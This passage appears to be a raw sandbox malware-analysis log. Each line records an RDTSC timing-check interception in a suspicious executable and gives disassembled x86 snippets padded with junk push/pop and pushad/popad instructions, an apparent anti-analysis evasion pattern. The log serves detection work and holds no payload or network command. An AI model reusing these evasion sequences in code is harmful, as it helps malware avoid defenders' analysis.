                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CCF592 second address: CCF5AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8584 second address: CD8590 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F61286B7176h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8590 second address: CD85E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F612923D915h 0x00000008 jmp 00007F612923D911h 0x0000000d push edi 0x0000000e pop edi 0x0000000f popad 0x00000010 jbe 00007F612923D90Ch 0x00000016 pop edx 0x00000017 pop eax 0x00000018 jne 00007F612923D925h 0x0000001e push eax 0x0000001f jmp 00007F612923D90Dh 0x00000024 pop eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8BE7 second address: CD8BEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD8BEB second address: CD8BEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD900B second address: CD9020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B717Fh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9154 second address: CD9158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9158 second address: CD9187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e jmp 00007F61286B7188h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pushad 0x00000018 popad 0x00000019 push edi 0x0000001a pop edi 0x0000001b pop ecx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9590 second address: CD9596 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD9596 second address: CD95B2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Ah 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F61286B7176h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD95B2 second address: CD95D3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D918h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CD95D3 second address: CD95D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EC30 second address: D1EC34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EC34 second address: D1EC4F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jo 00007F61286B7182h 0x00000013 jnc 00007F61286B7176h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EEE2 second address: D1EEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1EEE8 second address: D1EEEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F1CC second address: D1F209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007F612923D916h 0x0000000e js 00007F612923D906h 0x00000014 jmp 00007F612923D90Ah 0x00000019 jc 00007F612923D90Eh 0x0000001f push eax 0x00000020 pop eax 0x00000021 js 00007F612923D906h 0x00000027 popad 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F612923D90Eh 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F209 second address: D1F224 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F61286B717Eh 0x00000008 pushad 0x00000009 jne 00007F61286B7176h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8DC second address: D1F8E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8E1 second address: D1F8EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F61286B7176h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1F8EB second address: D1F8EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DED2 second address: D1DEDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F61286B7176h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEDE second address: D1DEE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEE3 second address: D1DEF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F61286B717Ah 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D1DEF2 second address: D1DF1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F612923D906h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d jnp 00007F612923D92Ah 0x00000013 jnp 00007F612923D912h 0x00000019 jmp 00007F612923D90Ch 0x0000001e push eax 0x0000001f push edx 0x00000020 push edx 0x00000021 pop edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D25B21 second address: D25B2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007F61286B7176h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330CF second address: D330F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F612923D906h 0x0000000a popad 0x0000000b jp 00007F612923D912h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330F3 second address: D330F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D330F7 second address: D33118 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F612923D910h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F612923D90Dh 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D33118 second address: D33130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F61286B7176h 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnp 00007F61286B7176h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D33130 second address: D33134 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32BC3 second address: D32BC7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D58 second address: D32D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Dh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D6F second address: D32D9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F61286B7176h 0x0000000a jg 00007F61286B7176h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push edi 0x00000014 pop edi 0x00000015 jmp 00007F61286B7189h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D32D9D second address: D32DE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007F612923D90Ch 0x0000000f jmp 00007F612923D918h 0x00000014 pushad 0x00000015 jmp 00007F612923D914h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D35840 second address: D35847 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D3D839 second address: D3D866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D913h 0x00000009 jmp 00007F612923D915h 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D49D74 second address: D49DAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F61286B7180h 0x00000009 pushad 0x0000000a jbe 00007F61286B718Dh 0x00000010 jmp 00007F61286B7185h 0x00000015 pushad 0x00000016 popad 0x00000017 push ecx 0x00000018 jo 00007F61286B7176h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504C3 second address: D504D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F612923D906h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jne 00007F612923D906h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504D7 second address: D504EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F61286B717Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504EF second address: D504F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D504F3 second address: D504F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D501D9 second address: D5021A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F612923D911h 0x00000008 jmp 00007F612923D90Fh 0x0000000d jmp 00007F612923D918h 0x00000012 push eax 0x00000013 pop eax 0x00000014 popad 0x00000015 push edi 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D54A4B second address: D54A66 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jp 00007F61286B7176h 0x0000000c popad 0x0000000d jl 00007F61286B7182h 0x00000013 jng 00007F61286B7176h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D54A66 second address: D54A95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 pop eax 0x00000007 jo 00007F612923D906h 0x0000000d jmp 00007F612923D90Bh 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F612923D914h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D6F85B second address: D6F876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007F61286B717Dh 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71892 second address: D718A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Fh 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718A6 second address: D718AD instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718AD second address: D718E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007F612923D912h 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F612923D916h 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 push ebx 0x0000001a pop ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D718E8 second address: D718F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71575 second address: D71579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D71579 second address: D71583 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F61286B7176h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D877EE second address: D8780E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F612923D906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F612923D910h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8780E second address: D87822 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B717Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8679F second address: D867CC instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F612923D90Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F612923D914h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D867CC second address: D867D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D867D0 second address: D867F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F612923D90Ah 0x00000009 pop edx 0x0000000a pop eax 0x0000000b popad 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F612923D90Bh 0x00000014 jnc 00007F612923D906h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D870A4 second address: D870C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnp 00007F61286B7176h 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F61286B7176h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F61286B7176h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D87224 second address: D87230 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jne 00007F612923D906h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874C5 second address: D874CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874CC second address: D874D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874D2 second address: D874D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D874D8 second address: D87503 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F612923D90Ch 0x0000000c jmp 00007F612923D918h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D88E90 second address: D88E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8EE52 second address: D8EE6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jng 00007F612923D906h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push edx 0x0000000f pop edx 0x00000010 push edx 0x00000011 pop edx 0x00000012 popad 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: D8EE6B second address: D8EE6F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: CA78D7 second address: CA78DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E0348 second address: 53E03A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F61286B7189h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d call 00007F61286B717Ch 0x00000012 call 00007F61286B7182h 0x00000017 pop ecx 0x00000018 pop edx 0x00000019 mov ebx, eax 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e jmp 00007F61286B717Ah 0x00000023 mov edx, dword ptr [ebp+0Ch] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F61286B717Ah 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03A9 second address: 53E03AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03AD second address: 53E03B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03B3 second address: 53E03B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03B9 second address: 53E03BD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 53E03BD second address: 53E03D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ecx, dword ptr [ebp+08h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F612923D90Bh 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400621 second address: 5400627 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400627 second address: 5400646 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, esi 0x00000005 mov bx, ax 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F612923D911h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400646 second address: 54006EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F61286B7187h 0x00000008 pop ecx 0x00000009 push edi 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 mov di, si 0x00000013 pushfd 0x00000014 jmp 00007F61286B717Ch 0x00000019 xor ah, 00000078h 0x0000001c jmp 00007F61286B717Bh 0x00000021 popfd 0x00000022 popad 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F61286B7186h 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c movzx eax, bx 0x0000002f jmp 00007F61286B7183h 0x00000034 popad 0x00000035 xchg eax, ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 push edi 0x0000003a pop eax 0x0000003b pushfd 0x0000003c jmp 00007F61286B7187h 0x00000041 jmp 00007F61286B7183h 0x00000046 popfd 0x00000047 popad 0x00000048 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 54006EC second address: 5400704 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F612923D914h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400704 second address: 5400708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400708 second address: 5400717 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400717 second address: 540071B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540071B second address: 5400721 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400721 second address: 5400736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F61286B7181h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400736 second address: 540073A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540073A second address: 540076E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F61286B7186h 0x00000012 adc ah, FFFFFFB8h 0x00000015 jmp 00007F61286B717Bh 0x0000001a popfd 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 540076E second address: 5400773 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\cFLK1CiiNK.exeRDTSC instruction interceptor: First address: 5400773 second address: 5400779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
